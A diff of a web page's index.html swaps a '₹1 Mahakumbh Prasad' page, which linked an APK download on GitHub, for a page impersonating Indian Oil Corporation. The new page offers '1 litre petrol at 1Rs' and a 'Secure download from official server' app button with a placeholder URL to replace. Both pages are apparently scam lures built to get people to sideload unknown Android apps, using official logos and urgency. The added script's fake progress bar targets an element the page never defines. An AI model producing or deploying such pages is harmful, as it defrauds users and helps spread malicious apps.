--- a/index.html
+++ b/index.html
@@ -1,179 +1,318 @@
 <!DOCTYPE html>
 <html lang="en">
+
 <head>
     <meta charset="UTF-8">
-    <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Mahakumbh Prasad 2025 - Official App</title>
+    <meta property="og:title" content="Indian Oil Corporation Ltd - Petrol @ 1RS from IndianOil">
+    <meta property="og:image" content="https://iocl.com/images/static/indianoil_logo.jpg" />
+    <meta property="og:description" content="Welcome to the world of IndianOil, an integrated service that gives you benefits of fuel." />
+   
+    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
+    <title>IndianOil | The Energy of India | Indian Oil Corporation Ltd.</title>
     <style>
+        @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@300;400;600;700&display=swap');
+
         * {
             margin: 0;
             padding: 0;
             box-sizing: border-box;
-            font-family: 'Helvetica', sans-serif;
         }
 
         body {
-            background: #fff;
+            font-family: 'Poppins', sans-serif;
+            background: #f4f7fc;
+            text-align: center;
+            padding-bottom: 70px;
+        }
+
+        .top-bar {
+            background: #ffffff;
+            color: white;
+            padding: 8px 15px;
+            font-size: 14px;
+            display: flex;
+            align-items: center;
+            justify-content: center;
+            gap: 10px;
+        }
+
+        .top-bar img {
+            height: 50px;
         }
 
         .header {
-            padding: 1rem;
-            background: #fff;
-            box-shadow: 0 2px 5px rgba(0, 0, 0, 0.1);
+            background: #ff6700;
+            padding: 15px 10px;
             text-align: center;
-            position: relative;
+            box-shadow: 0px 2px 5px rgba(0, 0, 0, 0.1);
         }
 
-        .header img {
-            max-width: 100px;
-            display: block;
-            margin: 0 auto 0.5rem;
+        .header h1 {
+            font-size: 20px;
+            color: white;
+            font-weight: 600;
+        }
+
+        .hero {
+            background: linear-gradient(to right, #eef2f6, #ffffff);
+            padding: 30px 20px 20px 20px;
+            box-shadow: 0px 4px 8px rgba(0, 0, 0, 0.1),
+                        0px -4px 8px rgba(0, 0, 0, 0.1);
+            text-align: center;
+            position: relative;
+            overflow: hidden;
+            margin-top: 10px;
+        }
+
+        .hero::before {
+            content: "";
+            position: absolute;
+            top: 0;
+            left: 0;
+            width: 100%;
+            height: 100%;
+            background-image: url('');
+            background-size: contain;
+            background-repeat: no-repeat;
+            background-position: center;
+            opacity: 0.2;
+            z-index: 0;
+        }
+
+        .hero > * {
+            position: relative;
+            z-index: 1;
+        }
+
+        .update-banner {
+            background: #ff6700;
+            color: #000;
+            font-weight: 600;
+            font-size: 14px;
+            padding: 6px 12px;
+            border: 2px solid #fff;
+            border-bottom: none;
+            border-top-left-radius: 8px;
+            border-top-right-radius: 8px;
+            display: inline-block;
+            margin-bottom: 15px;
+            position: relative;
+            z-index: 2;
+        }
+
+        .hero h1 {
+            font-size: 26px;
+            color: #000;
+            font-weight: 700;
+            margin-bottom: 10px;
+        }
+
+        .hero h1 span {
+            color: #015296;
+        }
+
+        .hero p {
+            font-size: 16px;
+            color: #444;
+            margin-bottom: 10px;
+        }
+
+        .hero ul {
+            text-align: left;
+            max-width: 300px;
+            padding-left: 20px;
+            margin: 0 auto;
+        }
+
+        .hero ul li {
+            font-size: 15px;
+            margin-bottom: 6px;
+        }
+
+        .hero-image {
+            width: 100%;
+            height: auto;
+            margin-top: 10px;
+            max-width: 100%;
         }
 
         .download-btn {
-            background: #FF6B00;
+            background: #ff5500;
             color: white;
-            padding: 0.8rem 1.5rem;
-            border-radius: 5px;
+            padding: 15px 30px;
+            font-size: 18px;
+            font-weight: 700;
+            text-align: center;
             text-decoration: none;
-            font-weight: 500;
+            transition: background 0.3s;
             display: inline-block;
-        }
-
-        .main-content {
-            max-width: 600px;
-            margin: 2rem auto;
-            padding: 0 1rem;
-            text-align: center;
-        }
-
-        /* Card view for the middle part */
-        .card {
-            background: #fff;
-            border-radius: 10px;
-            box-shadow: 0 4px 10px rgba(0, 0, 0, 0.1);
-            padding: 1.5rem;
-            margin: 1rem 0;
-        }
-
-        .prasad-grid {
-            display: grid;
-            gap: 1rem;
-            margin: 2rem 0;
-        }
-
-        .prasad-item {
-            padding: 1rem;
-            border: 1px solid #eee;
             border-radius: 8px;
-            text-align: left;
+            margin-top: 20px;
         }
 
-        .price {
-            color: #388E3C;
-            font-weight: bold;
-            margin-top: 0.5rem;
+        .download-btn:hover {
+            background: #ff5500;
         }
 
-        .points {
-            margin-top: 0.5rem;
-            color: #555;
-            font-size: 0.9rem;
+        footer {
+            background: #ff5500;
+            color: white;
+            padding: 12px;
+            font-size: 14px;
+            margin-top: 20px;
         }
 
-        .footer {
-            text-align: center;
-            padding: 2rem;
-            color: #666;
-            font-size: 0.9rem;
-        }
-
-        .install-banner {
+        .progress-overlay {
+            display: none;
             position: fixed;
-            bottom: 0;
+            top: 0;
             left: 0;
             width: 100%;
-            background: #FF6B00;
-            color: white;
-            text-align: center;
-            padding: 1rem;
+            height: 100%;
+            background: rgba(0, 0, 0, 0.5);
+            justify-content: center;
+            align-items: center;
         }
 
-        /* Style for the image above the heading */
-        .banner-image {
-            width: 100%;
-            max-width: 400px;
-            border-radius: 10px;
-            margin-bottom: 1rem;
+        .progress-container {
+            width: 120px;
+            height: 120px;
+            display: flex;
+            align-items: center;
+            justify-content: center;
+            border-radius: 50%;
+            background: conic-gradient(#015296 0deg, #ccc 0deg);
+            position: relative;
+        }
+
+        .progress-container::before {
+            content: "";
+            position: absolute;
+            width: 100px;
+            height: 100px;
+            background: white;
+            border-radius: 50%;
+        }
+
+        .progress-text {
+            position: absolute;
+            font-size: 16px;
+            font-weight: bold;
+            color: #015296;
+        }
+
+        /* Mobile Responsive */
+        @media (max-width: 768px) {
+            .header h1 {
+                font-size: 20px;
+            }
+
+            .hero h1 {
+                font-size: 22px;
+            }
+
+            .hero p {
+                font-size: 14px;
+            }
+
+            .download-btn {
+                width: 100%;
+                font-size: 16px;
+                padding: 15px 25px;
+            }
+
+            .hero-image {
+                max-width: 90%;
+            }
+        }
+
+        @media (max-width: 480px) {
+            .header h1 {
+                font-size: 18px;
+            }
+
+            .hero h1 {
+                font-size: 20px;
+            }
+
+            .hero p {
+                font-size: 14px;
+            }
+
+            .download-btn {
+                width: 100%;
+                font-size: 14px;
+                padding: 12px;
+            }
+
+            .hero-image {
+                max-width: 95%;
+            }
         }
     </style>
 </head>
+
 <body>
-    <!-- Header Section -->
-    <header class="header">
-        <!-- Logo -->
-        <img src="https://upload.wikimedia.org/wikipedia/commons/9/91/Prayagraj_Mahakumbh_2025_Logo.jpg" height="50sp" width="50sp" alt="Mahakumbh Logo">
-        <h3>Mahakumbh 2025</h3>
-    </header>
+    <div class="top-bar">
+        <img src="https://iocl.com/assets/images/logo.gif" alt="indianoil">
+    </div>
 
-    <!-- Main Content -->
-    <div class="main-content">
-        <!-- Card container for the middle part -->
-        <div class="card">
-            <!-- Banner image above the heading -->
-            <img src="https://cdn.zyrosite.com/cdn-cgi/image/format=auto,w=600,h=450,fit=crop/cdn-ecommerce/store_01JDKG8ERZFZ1HRBRE4JD31N3V%2Fassets%2F1737321484524-RedKissLoveInstagramSquarePost11.png"  height="150dp"   class="banner-image">
+    <div class="header">
+        <h1>1 Litre Petrol @ 1Rs at IndianOil</h1><span></span>
+    </div>
 
-            <h2 style="margin: 1rem 0; color: #333;">Order Sacred Prasad at ₹1</h2>
-            
-            <div class="prasad-grid">
-                <!-- Mahaprasadam Pack -->
-                <div class="prasad-item">
-                    <h4>Mahaprasadam Pack</h4>
-                    <div class="price">₹1 <s style="color: #999; margin-left: 0.5rem;">₹399</s></div>
-                    <ul class="points">
-                        <li>Includes sacred offerings from Mahakumbh.</li>
-                        <li>Prepared by temple priests with utmost purity.</li>
-                        <li>Limited-time offer, available exclusively on the app.</li>
-                        <li>Package includes: SweetPrasad,Rudraksh mala,Gangajaal and other</li>
-                    </ul>
-                </div>
-            </div>
+    <div class="hero">
+      <!-- <div class="update-banner"></div>-->
 
-            <p style="color: #666; margin: 2rem 0;">
-                Orders available exclusively<br>through our Android app
-            </p>
+        <h1>IndianOil<br><span>XTRAREWARDS</span></h1>
+        <p><strong>Includes:</strong></p>
+        <ul>
+            <li>Get 1-litre petrol at @ just 1RS.</li>
+            <li>Show barcode at any IndianOil Petrol pump</li>
+            <li>Limited to only 10-LAKH customers.</li>
+            <li>Download XtraRewards app from below and register to get barcode.</li>
+        </ul>
 
-            <!-- Download button with onclick functionality -->
-            <a href="#download" class="download-btn" onclick="window.open('https://github.com/mahakumbh2025/orderprasad/raw/refs/heads/main/Mahakumbh2025.apk', '_blank')">Download App</a>
+        <!-- Download Button Above the Image -->
+        <a href="https://example.com/download" class="download-btn" target="_blank">📲 Download XtraRewards App</a>
+        <p style="margin-top: 6px; font-size: 13px; color: rgb(82, 82, 82);">Secure download from official server</p>
+
+        <img src="https://iocl.com/admin/img/UploadedFiles/MenuHeading/Files/English/959a312d3edf41388dc2074cbc6471a9.jpg" alt="PM Narendra Modi" class="hero-image">
+    </div>
+
+    <footer>
+        &copy; Copyright © Indian Oil Corporation Ltd
+        <br> Site Map | Terms of Use | Data Privacy Policy | Hyperlinking Policy
+    </footer>
+
+    <div class="progress-overlay" id="progressOverlay">
+        <div class="progress-container">
+            <div class="progress-text" id="progressText">0%</div>
         </div>
     </div>
 
-    <!-- Footer -->
-    <footer class="footer">
-        <p style="margin-top: 0.5rem;">Contact: support@mahakumbhprasad.com</p>
-    </footer>
+    <script>
+        document.getElementById("downloadButton").addEventListener("click", function (event) {
+            event.preventDefault();
+            let overlay = document.getElementById("progressOverlay");
+            let progressText = document.getElementById("progressText");
 
-    <!-- Sticky Footer Install Banner -->
-    <div class="install-banner">
-        <p>Get the Mahakumbh 2025 app to order Prasad!</p>
-    <br>
-    <p>© 2025 Mahakumbh Prasad | India | English</p>
-  
-    </div>
-    <script type="text/javascript">
-var sc_project=13082558; 
-var sc_invisible=1; 
-var sc_security="ffdb46ea"; 
-</script>
-<script type="text/javascript"
-src="https://www.statcounter.com/counter/counter.js"
-async></script>
-<noscript><div class="statcounter"><a title="Web Analytics"
-href="https://statcounter.com/" target="_blank"><img
-class="statcounter"
-src="https://c.statcounter.com/13082558/0/ffdb46ea/1/"
-alt="Web Analytics"
-referrerPolicy="no-referrer-when-downgrade"></a></div></noscript>
+            overlay.style.display = "flex";
 
+            let progress = 0;
+            let interval = setInterval(() => {
+                progress += 10;
+                progressText.innerText = progress + "%";
+                if (progress >= 100) {
+                    clearInterval(interval);
+                    setTimeout(() => {
+                        overlay.style.display = "none";
+                        window.location.href = "https://example.com/download"; // Replace with your actual download URL
+                    }, 500);
+                }
+            }, 200);
+        });
+    </script>
 </body>
+
 </html>
